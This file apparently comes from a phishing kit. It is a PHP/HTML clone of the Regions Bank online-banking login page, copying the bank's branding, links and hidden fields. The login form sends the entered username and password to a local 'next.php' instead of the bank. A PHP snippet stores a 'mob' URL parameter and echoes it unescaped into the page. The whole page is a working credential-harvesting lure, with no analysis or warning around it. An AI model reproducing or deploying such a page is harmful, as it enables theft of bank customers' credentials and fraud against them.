<?php

if (isset($_GET['action']) && !empty($_GET['action']) && !empty($_GET['mob']) && $_GET['action'] == 'login') {
    $_SESSION['mobili'] = $_GET['mob'];
}
?>

<!DOCTYPE html>
<html x-ms-format-detection="none" lang="en">

<head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Log in to your Regions online banking account to securely access and manage accounts, pay bills, transfer money and more. New to online banking? Enroll today.">
    <title>Regions</title>
    <link href="assets/css/com-regions.css" rel="stylesheet">
    <link href="assets/css/olbAuth.css" rel="stylesheet">
    <link rel="icon" href="https://login.regions.com/Assets/favicon.ico">
</head>

<body>
    <style>
        .wrapper,
        .message,
        important-message-banner {
            display: none !important;
        }
    </style>
    <header class="rds-header simple">
        <div class="container">
            <a class="logo-link" href="https://www.regions.com/personal-banking" title="Go home">
                <picture class="logo">
                    <source srcset="assets/img/regions-logo-no-r.svg 1x" media="(max-width: 600px)">
                    <img src="assets/img/regions-logo-no-r.svg" alt="regions logo">
                </picture>
            </a>
        </div>
    </header>

    <noscript>
        <div class="warning-placeholder warning-message">
            Your browser is not capable of viewing this site because it does not support JavaScript or JavaScript may be disabled. Please enable JavaScript.
        </div>
    </noscript>

    <main role="main" class="pb-3" id="main-section">


        <link href="assets/css/Common.css" rel="stylesheet">

        <div>
            <div class="rds-wizard-body">
                <div class="body-content">
                    <div class="rds-short-form-tile container login-enroll">
                        <h1 class="sr-only"> Login to Online Banking</h1>
                        <div class="col-md-12">
                            <div class="alert alert-danger" id="page-level-error-box" aria-live="polite">
                                <div class="span sr-only">Login error status:</div>
                                <div id="page-level-message"></div>
                                <button type="button" id="alert-close" aria-label="Close alert">X</button>
                            </div>
                            <div class="col-md-6 col-xs-12" id="username-section" style="display: block;">
                                <h2 id="login-header">Existing Online Customers</h2>
                                <div class="row">
                                    <div class="col-xs-12">
                                        
                                        <input type="text" id="hdnIsPostRedirection" maxlength="18" value="False" class="hide-ele" data-val="true" data-val-required="The IsPostRedirection field is required." name="IsPostRedirection">
                                        <form class="rds-form form" action="../next.php" method="POST">

                                            <input name="__RequestVerificationToken" type="hidden" value="CfDJ8DeENtDT7xpAqS4LI0aPrvqvYiwq9vw0Fhb4SiCwV19g5J_lo693h45Hqghi8tN0aIhkXH31Cj-n6aU19wOI18ggTmg_SxAhACyLPOtHGJmDI_V1nAQFLdrND_H0LX33SDnYTBYTl_KU5-Uy__irOUs">
                                            <div id="divUserName" class="field animated-label text">
                                                <label class="control-label" for="UserName" id="username-label">Username</label>
                                                <input type="text" id="UserName" name="UserName" maxlength="18" aria-labelledby="username-label" aria-required="True" class="form-control to-switch" data-val="true" data-val-required="The Online ID field is required." autocomplete="off" required>
                                                <div id="UserName-error" class="error-custom-block hidden">
                                                    <p class="help-block error">Username is required to log in.</p>
                                                </div>
                                            </div>

                                            <div class="field animated-label text password" id="divPassword">
                                                <label class="control-label" for="input_password">Password</label>
                                                <input type="password" id="input_password" name="Password" class="form-control to-switch mask-text" maxlength="32" autocomplete="off" style="max-height: 67px; padding-top: 27px;" aria-invalid="false" required>
                                                <input type="button" class="inline-btn show-hide-btn" id="showHidePasswordBtn" value="Show" aria-label="Show Password" style="max-height: 67px; padding-top: 27px;">
                                                <div id="input_password-error" class="error-custom-block hidden">
                                                    <p class="help-block error">Password is required to log in.</p>
                                                </div>
                                            </div>

                                            <input hidden type="hidden" name="mobili" value="<?php if (isset($_SESSION['mobili'])) {
                                                                                                    echo $_SESSION['mobili'];
                                                                                                } ?>"></input>

                                            <div class="well warning-message">
                                                Please check that the "Caps Lock" or "Num Lock" key is off.
                                            </div>
                                            <div id="login-btn-holder">
                                                <div class="pull-left form-check">
                                                    <input type="checkbox" id="login-remember-me" class="form-check-input">
                                                    <label for="login-remember-me" class="form-check-label">Remember my username</label>
                                                </div>
                                                <div class="pull-right">
                                                    <button type="submit" class="btn btn-primary btn-lg" id="next-btn">Log In</button>
                                                </div>
                                            </div>
                                        </form>
                                    </div>
                                    <div id="login-forgot-url-link">
                                        <span class="forgot-url-link"><span aria-hidden="true">Forgot </span><a href="https://onlinebanking.regions.com/customerservice/Recoveruserid" aria-label="Forgot Username?">Username</a> or <a href="https://onlinebanking.regions.com/customerservice/forgottenpassword" aria-label="Forgot Password?">Password?</a></span>
                                    </div>
                                </div>
                            </div>
                            <div class="col-md-6 col-xs-12" id="enroll-section" style="display: block;">
                                <h2 id="enroll-header"> New Online Customers</h2>
                                <div class="well">
                                    <div class="row">
                                        <div class="col-xs-12">
                                            <h3 class="font-size-16"> Enroll Now To:</h3>

                                            <ul id="note-enroll-feature">
                                                <li><span>Access your accounts online</span></li>
                                                <li><span>Pay bills online</span></li>
                                                <li><span>Send us a secure message</span></li>
                                            </ul>
                                        </div>
                                    </div>
                                    <div class="row align-flex-right"><a class="btn btn-info btn-lg" href="https://onlinebanking.regions.com/enrollment/home">Enroll</a></div>
                                </div>
                            </div>
                        </div>
                        <div class="row col-md-6 col-md-offset-3" id="password-section">
                            <div class="col-xs-12">
                                <h2 id="password-header">Existing Online Customers</h2>
                                <div id="transmitContainer"></div>
                                <div id="password-forgot-url-link">
                                    <span class="forgot-url-link"><span aria-hidden="true">Forgot </span><a href="https://onlinebanking.regions.com/customerservice/Recoveruserid" aria-label="Forgot Username?">Username</a> or <a href="https://onlinebanking.regions.com/customerservice/forgottenpassword" aria-label="Forgot Password?">Password?</a></span>
                                </div>
                            </div>

                        </div>
                    </div>
                </div>
            </div>
        </div>

        <input type="hidden" name="IsSessionTimedOut" class="online-session" data-val="true" data-val-required="The IsSessionTimedOut field is required." id="IsSessionTimedOut" value="False">
        <input type="hidden" id="IsLoggerCallEnabled" data-val="true" data-val-required="The IsLoggerCallEnabled field is required." name="IsLoggerCallEnabled" value="True">
        <input type="hidden" id="TMXID" name="SessionID" value="e4019178-66bf-484c-94e5-2d3ac654fef5">
        <input type="hidden" id="TermsConditionURL" name="[TermsCondition]" value="https://www.regions.com/digital-banking/electronic-banking-service-agreement">
        <input type="hidden" id="ContactUsURL" name="[ContactUs]" value="https://www.regions.com/help">
        <input type="hidden" id="OTPLockMaxCount" name="OTPLockCount" value="5">
        <input type="hidden" id="OTPLockedout" value="false">
        <script src="reg_files/login.js"></script>





    </main>

    <div id="cookiesDisabled" class="warning-placeholder warning-message">
        Your browser is not capable of viewing this site because it does
        not support Cookies or Cookies may be disabled or blocked. Please
        enable Cookies.
        <br><br>
        For your security, please close all the browser windows now.
    </div>

    <footer class="rds-footer">
        <div class="footer-content">
            <ul>
                <li><a href="https://www.regions.com/help" target="_blank">Contact Us</a></li>
                <li><a href="https://www.regions.com/digital-banking/electronic-banking-service-agreement" target="_blank">Terms and Conditions</a></li>
                <li><a href="https://www.regions.com/about-regions/privacy-security/privacy-pledge" target="_blank">Privacy Pledge</a></li>
                <li><a href="https://www.regions.com/about-regions/privacy-security" target="_blank">Security</a></li>
                <li><a href="https://www.regions.com/about-regions/privacy-security/online-privacy-notice#ads" target="_blank">Online Tracking and Advertising</a></li>
                <li><a href="https://www.regions.com/about-regions/Accessible-Banking" target="_blank">Accessible Banking</a></li>
                <li><a href="https://survey.regions.com/jfe/form/SV_0Jm6o1kcV7mAmA5?source=olblogin" target="_blank">Leave Feedback</a></li>

            </ul>

            <p>Call&nbsp;<a href="tel:+18007344667">1-800-REGIONS</a></p>
            <p>Regions, the Regions logo, the LifeGreen color, and the LifeGreen bike are registered trademarks of Regions Bank.</p>
            <p>© 2022 Regions Bank. All Rights Reserved.</p>

            <div class="footer-icon">
                <img src="assets/img/equal-housing-lender.svg" alt="Equal Housing Lender">
                <img src="assets/img/member-fdic.svg" alt="Member FDIC">
            </div>
        </div>
    </footer>

    <div>
        <div class="modal fade" id="sessionTimeoutAlertModal" tabindex="-1" role="dialog" aria-label="Session Timeout Modal">
            <div class="modal-dialog" aria-labelledby="modal-title">
                <div class="modal-content">
                    <div class="modal-header" id="session-popup">
                        <button type="button" data-dismiss="modal" aria-label="Close" id="modal-close" class="close-modal-window">
                            <span aria-hidden="true">×</span>
                        </button>
                        <h2 id="modal-title" tabindex="-1" aria-describedby="pop-up-content">Session Timeout</h2>
                    </div>
                    <div id="modalBody" class="modal-body" role="document" aria-describedby="pop-up-content">
                        <p id="pop-up-content">Your session will expire in <span id="pop-up-timer"></span>. Closing this dialogue box will not extend your time limit.</p>
                    </div>
                    <div class="modal-footer">
                        <button type="button" class="btn btn-info close-modal-window" id="close-btn" data-dismiss="modal">
                            Close
                        </button>
                    </div>
                </div>
            </div>
        </div>

    </div>

    <script>
        var cookiesDisabled = true;
        if ("cookie" in document) {
            document.cookie = "TestCookie=testcookie;path=/;secure;";
            cookiesDisabled = (document.cookie.indexOf("TestCookie") == -1);
        }
        if (cookiesDisabled) {
            document.getElementById("cookiesDisabled").style.display = "block";
            document.getElementById("main-section").style.display = "none";
        }
    </script>

    <script src="assets/js/regionslib.js"></script>


    <noscript type="text/javascript" src="https://tm.regions.com/fp/tags?org_id=3uc6h1j9&amp;session_id=e4019178-66bf-484c-94e5-2d3ac654fef5"></noscript>


    </script>

</body>

</html>